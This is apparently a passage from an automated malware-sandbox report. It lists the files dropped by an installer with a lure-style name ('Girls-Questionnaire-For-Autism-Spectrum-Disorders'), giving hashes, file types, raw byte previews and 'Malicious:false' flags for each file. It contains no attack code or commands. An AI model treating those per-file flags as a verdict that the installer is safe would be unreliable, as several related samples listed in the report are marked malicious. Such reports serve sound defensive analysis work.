                                                                                            Category:dropped
                                                                                            Size (bytes):131072
                                                                                            Entropy (8bit):0.012068139037335553
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ImtVOb+j4x9pPlXlaWMtlnyPll//zVrzlltD0lGQZ7XEZhGIelHdP4/X:IiV0g4x9pdyt2//hFwl570ZhdelG/
                                                                                            MD5:AA497CF5DFF0E22EDE9DB121E8F5F205
                                                                                            SHA1:335D33FDAB84EA6E02590D0A2025220BCC91A53B
                                                                                            SHA-256:98761AF76D97F04AEFCF7D4A65C2E5CDC6148A1633FB39A90F711EDD8BCCF9AE
                                                                                            SHA-512:4E712F703E8DF36827EE94C971DBCA82841948A2E66712A43905AE8B713AE4EBE4ACBCF1C44F63F62D13F6C4B9C12D490B128E504BA501D8320241BD0922F1E0
                                                                                            Malicious:false
                                                                                            Preview: VLnk.....?.......Tq.>..j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-211211235601Z-181.bmp
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32
                                                                                            Category:dropped
                                                                                            Size (bytes):71190
                                                                                            Entropy (8bit):3.23538305871218
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:2Sk6OAOEDyoMJLCEwlMDNVRXwII7c7JOhXGFIgCd1sDuRvYfEU0NsgDW9ATCj8wq:YF6DSwlI5R7JEx3sKvjWu3xOfePn
                                                                                            MD5:867476F332723EC610B15F7D07FED484
                                                                                            SHA1:EF619DB72371B0BDCB7D06338B2FAEFFE9E39DB4
                                                                                            SHA-256:48E1744D768D4B39B88B829D3D1E891A1619B49FA968AB7BC5C4471D95DD23B3
                                                                                            SHA-512:35C989E10870830F1DE7C16D8D310ABA56F288FF75EA70A6A3612BACFDCDF94D8B5D2E06FC2D0D9E79D85FD709ABB26DCFFA70FE48BABFE20BF70B16A755A16A
                                                                                            Malicious:false
                                                                                            Preview: BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3024000
                                                                                            Category:modified
                                                                                            Size (bytes):61440
                                                                                            Entropy (8bit):3.564625031101348
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:3eI9dThltELJ8fwRRwZsLRGlKhsvXh+vSc:tkYZsLQhUSc
                                                                                            MD5:87746036B6A698C8413860EC06F30FFF
                                                                                            SHA1:6F884BBB9CC9A596A9AB6640C44E3EAF7C11569F
                                                                                            SHA-256:AB16B566F8FEFD8C2A5FB4B2850D5C36E79D9D3BF0BC7DA12FF2357776EF7CF2
                                                                                            SHA-512:FBD48C4A4BE070AF337FF71D080749F6B2F22CD42AF995614474BB878168CE51A3048499D7CAD27ADBD6237825537660342691136FEEA57CFF20C61139149DDD
                                                                                            Malicious:false
                                                                                            Preview: SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:SQLite Rollback Journal
                                                                                            Category:dropped
                                                                                            Size (bytes):8720
                                                                                            Entropy (8bit):3.284347528849945
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:7Mgom1CYiomgiom2om1Nom1Aiom1RROiom1oom1pom14ZiomVsiomgcgqQlmFTIZ:7cY7OhcCscgN49IVXEBodRBkA
                                                                                            MD5:D64E95B252745E15292566310E4E72EC
                                                                                            SHA1:F206060FCE5647B60C1A6EF5D34B0FF896501D67
                                                                                            SHA-256:15EA61003CC83549D7E250DDF7DC09F3C162D2B699B87EE2FD1343D9B4D44D07
                                                                                            SHA-512:F9B5C2B8F53375E86754F05AE4A51A98C80893F983CE6EF87670DEF485DC3E7ED4485E969703FF94C8E64D9AC3858BC442A1227A712B512FE4D5B81587B4D61E
                                                                                            Malicious:false
                                                                                            Preview: .... .c.....F..Y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s........L.s.y................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.5356
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):157443
                                                                                            Entropy (8bit):5.172039478677
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z0ADWp1ttawvayKLWbVG3+2:RNj3aRlQShhp2VpMKRhWa11quVJX2
                                                                                            MD5:A2C6972A1A9506ACE991068D7AD37098
                                                                                            SHA1:BF4D2684587CF034BCFC6F74CED551F9E5316440
                                                                                            SHA-256:0FB687D20C49DDBADD42ABB489C3B492B5A1893352E2F4B6AA1247EFE7363F65
                                                                                            SHA-512:4D03884CA5D1652A79E6D55D8F92F4D138C47D462E05C3E6A685DA6742E98841D9C63720727203B913A179892C413BFB33C05416E1675E0CF80DA98BE90BA5E4
                                                                                            Malicious:false
                                                                                            Preview: %!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr
                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):157443
                                                                                            Entropy (8bit):5.172039478677
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z0ADWp1ttawvayKLWbVG3+2:RNj3aRlQShhp2VpMKRhWa11quVJX2
                                                                                            MD5:A2C6972A1A9506ACE991068D7AD37098
                                                                                            SHA1:BF4D2684587CF034BCFC6F74CED551F9E5316440
                                                                                            SHA-256:0FB687D20C49DDBADD42ABB489C3B492B5A1893352E2F4B6AA1247EFE7363F65
                                                                                            SHA-512:4D03884CA5D1652A79E6D55D8F92F4D138C47D462E05C3E6A685DA6742E98841D9C63720727203B913A179892C413BFB33C05416E1675E0CF80DA98BE90BA5E4
                                                                                            Malicious:false
                                                                                            Preview: %!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr
                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):8003
                                                                                            Entropy (8bit):4.839308921501875
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                                                            MD5:937C6E940577634844311E349BD4614D
                                                                                            SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                                                            SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                                                            SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                                                            Malicious:false
                                                                                            Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):19540
                                                                                            Entropy (8bit):5.587475606743866
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:+tyfGhuq0/sVbX+uH3ISBKn+FmbWjul5IzlYQmhuETf7cGFWPXw:oOG+u44K+FmbWCl54oX
                                                                                            MD5:073639F13AD7B59EDCD0504B839875AC
                                                                                            SHA1:87DA7C3F5DCC5CFB9C3CA489F186C4FFAC4741D1
                                                                                            SHA-256:F60A4C78425DCE67F00DF4C24E0D832AAA57134A06D2D2D757A557D7D0A1BA4A
                                                                                            SHA-512:CFE7BFCF4DE0D69E6F1AC1BC5EFBA23F1274035100A8CAFC2850DDAA228AFBC032A7D3F6276889B17D81236F94188FAD99D87826106813E26FD2FD4B498391B7
                                                                                            Malicious:false
                                                                                            Preview: @...e...................h.................I..........@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)A.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0iwqijbw.lgz.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ljieogp.q2i.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdekav2v.k3o.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftjtge00.kch.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqsb1rib.anu.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ju4ihbqg.20l.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgj32aem.s4e.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_riiu5vtd.0np.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uc3q3u0g.0n3.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycp1urbi.5ym.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yoaqero5.taq.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzom5gkv.jua.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):35616
                                                                                            Entropy (8bit):6.953519176025623
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: 6rfyiAq0nM.msi, Detection: malicious, Browse
                                                                                            • Filename: ListSvc.exe, Detection: malicious, Browse
                                                                                            • Filename: Freddie-Mac-Warrantable-Condo-List.exe, Detection: malicious, Browse
                                                                                            • Filename: iumk21HlC8.exe, Detection: malicious, Browse
                                                                                            • Filename: FxWNeUN38R.exe, Detection: malicious, Browse
                                                                                            • Filename: 7CiwBIK7nr.exe, Detection: malicious, Browse
                                                                                            • Filename: 978B4AC05A227B23EF7E4FADFF92966339BA1413BAC5A.exe, Detection: malicious, Browse
                                                                                            • Filename: Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exe, Detection: malicious, Browse
                                                                                            • Filename: How-To-Get-A-Statement-From-Netspend.exe, Detection: malicious, Browse
                                                                                            • Filename: gj13C7atN2.exe, Detection: malicious, Browse
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):6144
                                                                                            Entropy (8bit):4.720366600008286
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: BF1.exe, Detection: malicious, Browse
                                                                                            • Filename: AIlUgor6h7.exe, Detection: malicious, Browse
                                                                                            • Filename: 7S6KBG5w7W.exe, Detection: malicious, Browse
                                                                                            • Filename: 4r4WFkpvvq.exe, Detection: malicious, Browse
                                                                                            • Filename: 21ABA879CA90E3D4B3B58F61316B6B42C97D31F62DEA2.exe, Detection: malicious, Browse
                                                                                            • Filename: 5Yi7XQkHUQ.exe, Detection: malicious, Browse
                                                                                            • Filename: 991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exe, Detection: malicious, Browse
                                                                                            • Filename: 67MPsax8fd.exe, Detection: malicious, Browse
                                                                                            • Filename: B10274561191CEDB0B16D2A69FDCD4E5062EDFE262184.exe, Detection: malicious, Browse
                                                                                            • Filename: 2HFJezUWHA.exe, Detection: malicious, Browse
                                                                                            • Filename: OabbZE2zf1.exe, Detection: malicious, Browse
                                                                                            • Filename: MiNj1lDY5T.exe, Detection: malicious, Browse
                                                                                            • Filename: 1Edyk9e6oL.exe, Detection: malicious, Browse
                                                                                            • Filename: caYfUkPlTx.exe, Detection: malicious, Browse
                                                                                            • Filename: 8CY6nr1mmt.exe, Detection: malicious, Browse
                                                                                            • Filename: OGzuPn8ahY.exe, Detection: malicious, Browse
                                                                                            • Filename: OPKyR75fJn.exe, Detection: malicious, Browse
                                                                                            • Filename: mapcmapc-registratio_39379648.exe, Detection: malicious, Browse
                                                                                            • Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious, Browse
                                                                                            • Filename: 42E07EA0F43BEC6913D6AC78FF74536695AE273CD28DB.exe, Detection: malicious, Browse
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\nyc-204_2016.pdf
